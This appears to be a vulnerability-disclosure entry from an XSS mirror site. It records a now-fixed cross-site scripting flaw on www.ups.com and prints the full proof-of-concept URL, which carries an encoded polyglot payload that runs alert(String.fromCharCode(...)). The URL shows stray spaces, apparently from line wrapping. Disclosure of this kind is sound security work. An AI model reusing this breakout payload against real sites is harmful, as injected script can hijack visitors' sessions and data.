Security researcher Flux, has submitted on 24/11/2012 a cross-site-scripting (XSS) vulnerability affecting www.ups.com, which at the time of submission ranked 194 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/03/2015. It is currently fixed. |
Date submitted: 24/11/2012 |
Date published: 12/03/2015 |
Date fixed: 12/03/2015 | Status: FIXED |
Author: Flux |
Domain: www.ups.com |
Category: XSS |
Pagerank: 194 |
URL: http://www.ups.com/content/us/en/bussol/browse/cat/wireless.html?loc=en_US%22%3E%27;alert%28String.f romCharCode%2870,%20108,%20117,%20120,%2032,%2049,%2051,%2051,%2055,%2032,%2082,%2048,%2048,%2084%29 %29//\%27;alert%28String.fromCharCode%2870,%20108,%20117,%20120,%2032,%2049,%2051,%2051,%2055,%2032, %2082,%2048,%2048,%2084%29%29//%22;alert%28String.fromCharCode%2870,%20108,%20117,%20120,%2032,%2049 ,%2051,%2051,%2055,%2032,%2082,%2048,%2048,%2084%29%29//\%22;alert%28String.fromCharCode%2870,%20108 ,%20117,%20120,%2032,%2049,%2051,%2051,%2055,%2032,%2082,%2048,%2048,%2084%29%29//--%3E%3C/SCRIPT%3E %22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2870,%20108,%20117,%20120,%2032,%2049,%2051,%205 1,%2055,%2032,%2082,%2048,%2048,%2084%29%29%3C/SCRIPT%3E&viewID=categoryView&contentID=ct1_sol_cat_w ireless&WT.svl=PNRO_L1 |
Click here to view the mirror
|
|